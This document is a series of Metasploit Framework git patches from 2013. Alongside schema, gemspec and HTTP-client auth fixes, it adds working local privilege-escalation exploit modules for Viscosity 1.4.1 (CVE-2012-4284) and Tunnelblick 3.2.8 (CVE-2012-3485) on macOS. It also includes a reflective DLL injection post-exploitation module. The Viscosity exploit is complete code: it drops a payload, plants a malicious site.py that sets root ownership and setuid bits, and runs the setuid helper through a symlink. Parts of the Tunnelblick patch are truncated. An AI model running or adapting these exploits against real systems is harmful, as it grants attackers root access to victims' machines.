"blame" + t.binary "request" + t.binary "proof", :null => false + t.string "owner" + t.text "payload" + end + + add_index "web_vulns", ["method"], :name => "index_web_vulns_on_method" + add_index "web_vulns", ["name"], :name => "index_web_vulns_on_name" + add_index "web_vulns", ["path"], :name => "index_web_vulns_on_path" + + create_table "wmap_requests", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.string "meth", :limit => 32 + t.text "path" + t.text "headers" + t.text "query" + t.text "body" + t.string "respcode", :limit => 16 + t.text "resphead" + t.text "response" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "wmap_targets", :force => true do |t| + t.string "host" + t.string "address", :limit => nil + t.integer "port" + t.integer "ssl" + t.integer "selected" + t.datetime "created_at" + t.datetime "updated_at" + end + + create_table "workspace_members", :id => false, :force => true do |t| + t.integer "workspace_id", :null => false + t.integer "user_id", :null => false + end + + create_table "workspaces", :force => true do |t| + t.string "name" + t.datetime "created_at", :null => false + t.datetime "updated_at", :null => false + t.string "boundary", :limit => 4096 + t.string "description", :limit => 4096 + t.integer "owner_id" + t.boolean "limit_to_network", :default => false, :null => false + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/lib/base64_serializer_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/lib/base64_serializer_spec.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb index 66d1de6804..32b4bef890 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb @@ -11,6 +11,8 @@ Bundler.require(:default, :test) # full backtrace in logs so its easier to trace errors Rails.backtrace_cleaner.remove_silencers! +require 'simplecov' + # Requires supporting ruby files with custom matchers and macros, etc, # in spec/support/ and its subdirectories. support_glob = MetasploitDataModels.root.join('spec', 'support', '**', '*.rb') diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec similarity index 72% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec index 7b728268c3..a88f2d9cd0 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.3.0.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.3.0" + s.version = "0.5.1" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2012-11-01" + s.date = "2013-03-01" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"] @@ -21,20 +21,26 @@ Gem::Specification.new do |s| if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then s.add_development_dependency(%q, [">= 0"]) - s.add_runtime_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_development_dependency(%q, [">= 0"]) + s.add_runtime_dependency(%q, [">= 3.2.10"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) s.add_runtime_dependency(%q, [">= 0"]) else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) end else s.add_dependency(%q, [">= 0"]) - s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 0"]) + s.add_dependency(%q, [">= 3.2.10"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) s.add_dependency(%q, [">= 0"]) From 76180f22fcb5a69e12239278783ab37db5d5143b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 13:23:21 +0100 Subject: [PATCH 129/139] added module for cve-2012-4284 --- .../exploits/osx/local/setuid_viscosity.rb | 122 ++++++++++++++++++ 1 file changed, 122 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_viscosity.rb diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb new file mode 100644 index 0000000000..c068b4c3a1 --- /dev/null +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -0,0 +1,122 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/linux/priv' +require 'msf/core/exploit/exe' + + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Viscosity Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The + vulnerability exists in the setuid ViscosityHelper, where an insufficient + validation of path names allows execution of arbitrary python code as root. + This module has been tested successfully on Viscosity 1.4.1 over Mac OS X + 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-4284' ], + [ 'OSVDB', '84709' ], + [ 'EDB', '20485' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 12 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Viscosity 1.4.1 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Viscosity 1.4.1 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + ], self.class) + end + + def check + if not file?(datastore["Viscosity"]) + print_error "ViscosityHelper not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Viscosity"]} -type f -user root -perm -4000") + + if check =~ /ViscosityHelper/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + file_rm(@python_file) + file_rm("#{@python_file}c") + file_rm(@exe_file) + end + + def exploit + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + + evil_python = %Q{ +import os +os.setuid(0) +os.setgid(0) +os.system("chown root #{@exe_file}") +os.system("chmod 6777 #{@exe_file}") +os.execl("#{@exe_file}", "#{exe_name}") + } + @python_file = "#{datastore["WritableDir"]}/site.py" + print_status("Dropping python #{@python_file}...") + write_file(@python_file, evil_python) + + print_status("Creating symlink...") + link_name = rand_text_alpha(8) + @link = "#{datastore["WritableDir"]}/#{link_name}" + cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}" + + print_status("Running...") + begin + cmd_exec "#{@link}" + rescue + print_error("Failed. Cleaning files #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}...") + clean + return + end + print_warning("Remember to clean files: #{@link}, #{@python_file}, #{@python_file}c and #{@exe_file}") + end +end + From 81e2dbc71e5d69128e108c73cf0de2e2a70c281b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Sun, 3 Mar 2013 19:48:12 +0100 Subject: [PATCH 130/139] added module for CVE-2012-3485 --- .../exploits/osx/local/setuid_tunnelblick.rb | 121 ++++++++++++++++++ 1 file changed, 121 insertions(+) create mode 100644 modules/exploits/osx/local/setuid_tunnelblick.rb diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb new file mode 100644 index 0000000000..66db2db4d9 --- /dev/null +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -0,0 +1,121 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/exploit/exe' + +class Metasploit4 < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Post::File + include Msf::Post::Common + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Setuid Tunnelblick Exploit', + 'Description' => %q{ + This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The + vulnerability exists in the setuid openvpnstart, where an insufficient + validation of path names allows execution of arbitrary shell scripts as root. + This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 + over Mac OS X 10.7.5. + }, + 'References' => + [ + [ 'CVE', '2012-3485' ], + [ 'EDB', '20443' ], + [ 'URL', 'http://blog.zx2c4.com/791' ] + ], + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Jason A. Donenfeld', # Vulnerability discovery and original Exploit + 'juan vazquez' # Metasploit module + ], + 'DisclosureDate' => 'Aug 11 2012', + 'Platform' => 'osx', + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell' ], + 'Targets' => + [ + [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ], + [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 }, + 'DefaultTarget' => 0 + })) + register_options([ + # These are not OptPath becuase it's a *remote* path + OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), + OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ]) + ], self.class) + end + + def check + if not file?(datastore["Tunnelblick"]) + print_error "openvpnstart not found" + return CheckCode::Safe + end + + check = session.shell_command_token("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000") + + if check =~ /openvpnstart/ + return CheckCode::Vulnerable + end + + return CheckCode::Safe + end + + def clean + file_rm(@link) + cmd_exec("rm -rf #{datastore["WritableDir"]}/openvpn") + end + + def exploit + + print_status("Creating directory...") + cmd_exec "mkdir -p #{datastore["WritableDir"]}/openvpn/openvpn-0" + + exe_name = rand_text_alpha(8) + @exe_file = "#{datastore["WritableDir"]}/openvpn/openvpn-0/#{exe_name}" + print_status("Dropping executable #{@exe_file}") + write_file(@exe_file, generate_payload_exe) + cmd_exec "chmod +x #{@exe_file}" + + + evil_sh =< Date: Sun, 3 Mar 2013 19:52:31 +0100 Subject: [PATCH 131/139] fixed EOF --- modules/exploits/osx/local/setuid_tunnelblick.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index 66db2db4d9..e12441c14b 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -91,11 +91,10 @@ class Metasploit4 < Msf::Exploit::Local cmd_exec "chmod +x #{@exe_file}" - evil_sh =< Date: Sun, 3 Mar 2013 19:54:17 +0100 Subject: [PATCH 132/139] minor fixes --- modules/exploits/osx/local/setuid_viscosity.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index c068b4c3a1..4c674f2f07 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -9,10 +9,8 @@ require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' -require 'msf/core/post/linux/priv' require 'msf/core/exploit/exe' - class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking @@ -58,7 +56,7 @@ class Metasploit4 < Msf::Exploit::Local register_options([ # These are not OptPath becuase it's a *remote* path OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]), - OptString.new("Viscosity", [ true, "Path to setuid nmap executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) + OptString.new("Viscosity", [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ]) ], self.class) end @@ -91,14 +89,15 @@ class Metasploit4 < Msf::Exploit::Local print_status("Dropping executable #{@exe_file}") write_file(@exe_file, generate_payload_exe) - evil_python = %Q{ + evil_python =<<-EOF import os os.setuid(0) os.setgid(0) os.system("chown root #{@exe_file}") os.system("chmod 6777 #{@exe_file}") os.execl("#{@exe_file}", "#{exe_name}") - } + EOF + @python_file = "#{datastore["WritableDir"]}/site.py" print_status("Dropping python #{@python_file}...") write_file(@python_file, evil_python) From 6d811ce4b92dc45620c1bdcceca79eee0162c2e4 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 09:09:11 -0600 Subject: [PATCH 133/139] empty passwords should be allowed --- lib/rex/proto/http/client.rb | 8 +------- 1 file changed, 1 insertion(+), 7 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 4a8d8108f3..3461a0067e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -262,15 +262,9 @@ class Client if opts['username'].nil? or opts['username'] == '' if self.username and not (self.username == '') opts['username'] = self.username - else - opts['username'] = nil - end - end - - if opts['password'].nil? or opts['password'] == '' - if self.password and not (self.password == '') opts['password'] = self.password else + opts['username'] = nil opts['password'] = nil end end From 92ee4300dfe8616ff711a18796be8817c48f96a4 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 4 Mar 2013 17:40:09 +0100 Subject: [PATCH 134/139] cleanup for reflective_dll_inject --- .../windows/manage/reflective_dll_inject.rb | 29 ++++++++++--------- 1 file changed, 16 insertions(+), 13 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index ac7d447afe..7f9a39ab2e 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb @@ -12,15 +12,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => + [ + [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] + ] )) register_options( @@ -49,7 +52,7 @@ class Metasploit3 < Msf::Post end end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + raise "Can't find an exported ReflectiveLoader function!" if offset.nil? or offset == 0 rescue print_error( "Failed to read and parse Dll file: #{$!}" ) return @@ -60,7 +63,7 @@ class Metasploit3 < Msf::Post def inject_into_pid(pay, pid, offset) - if offset.nil? + if offset.nil? or offset == 0 print_error("Reflective Loader offset is nil.") return end @@ -79,19 +82,19 @@ class Metasploit3 < Msf::Post begin print_status("Opening process #{pid}") host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - print_status("Generating payload") print_status("Allocating memory in procees #{pid}") mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) # Ensure memory is set for execution host_process.memory.protect(mem) - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") - print_status("Writing the stager into memory...") + vprint_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the payload into memory") host_process.memory.write(mem, pay) + print_status("Executing payload") host_process.thread.create(mem+offset, 0) print_good("Successfully injected payload in to process: #{pid}") rescue ::Exception => e print_error("Failed to Inject Payload to #{pid}!") - print_error(e.to_s) + vprint_error(e.to_s) end end end From 12247d47ba78d91552d48e523dec714fa805b139 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 4 Mar 2013 10:46:05 -0600 Subject: [PATCH 135/139] Rename module, sorry, no pull request. --- modules/exploits/osx/local/setuid_viscosity.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_viscosity.rb b/modules/exploits/osx/local/setuid_viscosity.rb index 4c674f2f07..c70127857e 100644 --- a/modules/exploits/osx/local/setuid_viscosity.rb +++ b/modules/exploits/osx/local/setuid_viscosity.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Viscosity Exploit', + 'Name' => 'Viscosity setuid-set ViscosityHelper Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where an insufficient From 7fa24d9060bd83487d19089555a14aff127e7cca Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 4 Mar 2013 10:54:33 -0600 Subject: [PATCH 136/139] Module rename --- modules/exploits/osx/local/setuid_tunnelblick.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/osx/local/setuid_tunnelblick.rb b/modules/exploits/osx/local/setuid_tunnelblick.rb index e12441c14b..691e167901 100644 --- a/modules/exploits/osx/local/setuid_tunnelblick.rb +++ b/modules/exploits/osx/local/setuid_tunnelblick.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Local def initialize(info={}) super( update_info( info, { - 'Name' => 'Setuid Tunnelblick Exploit', + 'Name' => 'Setuid Tunnelblick Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where an insufficient From 6dcca7df78c6c1e2f589ed33cedbda652f14710e Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:24:26 -0600 Subject: [PATCH 137/139] Remove duplicated header issues Headers were getting duped back into client config, causing invalid requests to be sent out --- lib/msf/core/exploit/http/client.rb | 15 +++++---------- lib/rex/proto/http/client.rb | 1 + lib/rex/proto/http/client_request.rb | 7 ++++--- modules/auxiliary/scanner/http/http_login.rb | 7 ++++++- 4 files changed, 16 insertions(+), 14 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6769a44b9a..a156bc4e3a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -145,6 +145,9 @@ module Exploit::Remote::HttpClient dossl = ssl end + client_username = opts['username'] || datastore['USERNAME'] || '' + client_password = opts['password'] || datastore['PASSWORD'] || '' + nclient = Rex::Proto::Http::Client.new( rhost, rport.to_i, @@ -155,8 +158,8 @@ module Exploit::Remote::HttpClient dossl, ssl_version, proxies, - datastore['USERNAME'], - datastore['PASSWORD'] + client_username, + client_password ) # Configure the HTTP client with the supplied parameter @@ -258,10 +261,6 @@ module Exploit::Remote::HttpClient def send_request_raw(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_raw(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error @@ -277,10 +276,6 @@ module Exploit::Remote::HttpClient def send_request_cgi(opts={}, timeout = 20) begin c = connect(opts) - if opts['username'] and opts['username'] != '' - c.username = opts['username'].to_s - c.password = opts['password'].to_s - end r = c.request_cgi(opts) c.send_recv(r, opts[:timeout] ? opts[:timeout] : timeout) rescue ::Errno::EPIPE, ::Timeout::Error diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 3461a0067e..f360701556 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -158,6 +158,7 @@ class Client opts['port'] = self.port req = ClientRequest.new(opts) + req end # diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index e0cdb4946f..76a4294af1 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -21,7 +21,7 @@ class ClientRequest 'cgi' => true, 'cookie' => nil, 'data' => '', - 'headers' => {}, + 'headers' => nil, 'raw_headers' => '', 'method' => 'GET', 'path_info' => '', @@ -87,6 +87,7 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) + @opts['headers'] ||= {} end def to_s @@ -165,13 +166,13 @@ class ClientRequest # If an explicit User-Agent header is set, then use that instead of # the default - unless opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('user-agent') req << set_agent_header end # Similar to user-agent, only add an automatic auth header if a # manual one hasn't been provided - unless opts['headers'].keys.map{|x| x.downcase }.include?('authorization') + unless opts['headers'] and opts['headers'].keys.map{|x| x.downcase }.include?('authorization') req << set_auth_header end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 40446f68db..0452e583e6 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -66,6 +66,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res @@ -75,6 +77,8 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => path, 'method' => datastore['REQUESTTYPE'], + 'username' => '', + 'password' => '' }, 10) next if not res end @@ -94,7 +98,8 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - + load "lib/rex/proto/http/client_request.rb" + if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From 71ba044d03299fc939b2ccf861cb900d830986ed Mon Sep 17 00:00:00 2001 From: David Maloney Date: Mon, 4 Mar 2013 11:25:34 -0600 Subject: [PATCH 138/139] remove debugging aid --- modules/auxiliary/scanner/http/http_login.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 0452e583e6..13a8f2a733 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -98,8 +98,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - load "lib/rex/proto/http/client_request.rb" - if ( datastore['REQUESTTYPE'] == "PUT" ) and (datastore['AUTH_URI'] == "") print_error("You need need to set AUTH_URI when using PUT Method !") return From cb18b81503b4f23b465020ed63b1676599d09c1c Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 4 Mar 2013 11:59:30 -0600 Subject: [PATCH 139/139] Add spec to ensure auth is sane --- spec/lib/rex/proto/http/client_spec.rb | 49 ++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 3ddd07d6bd..77ca6c4758 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -87,6 +87,55 @@ describe Rex::Proto::Http::Client do end end + context "with credentials" do + subject(:cli) do + cli = Rex::Proto::Http::Client.new(ip) + cli + end + let(:first_response) { + "HTTP/1.1 401 Unauthorized\r\nContent-Length: 0\r\nWWW-Authenticate: Basic realm=\"foo\"\r\n\r\n" + } + let(:authed_response) { + "HTTP/1.1 200 Ok\r\nContent-Length: 0\r\n\r\n" + } + let(:user) { "user" } + let(:pass) { "pass" } + + it "should not send creds on the first request in order to induce a 401" do + req = cli.request_cgi + req.to_s.should_not match("Authorization:") + end + + it "should send creds after receiving a 401" do + conn = mock + conn.stub(:put) + conn.stub(:shutdown) + conn.stub(:close) + + conn.should_receive(:get_once).and_return(first_response, authed_response) + conn.should_receive(:put) do |str_request| + str_request.should_not include("Authorization") + nil + end + conn.should_receive(:put) do |str_request| + str_request.should include("Authorization") + nil + end + + cli.should_receive(:_send_recv).twice.and_call_original + + Rex::Socket::Tcp.stub(:create).and_return(conn) + + opts = { "username" => user, "password" => pass} + req = cli.request_cgi(opts) + cli.send_recv(req) + + # Make sure it didn't modify the argument + opts.should == { "username" => user, "password" => pass} + end + + end + it "should attempt to connect to a server" do this_cli = Rex::Proto::Http::Client.new("127.0.0.1", 1) expect { this_cli.connect(1) }.to raise_error ::Rex::ConnectionRefused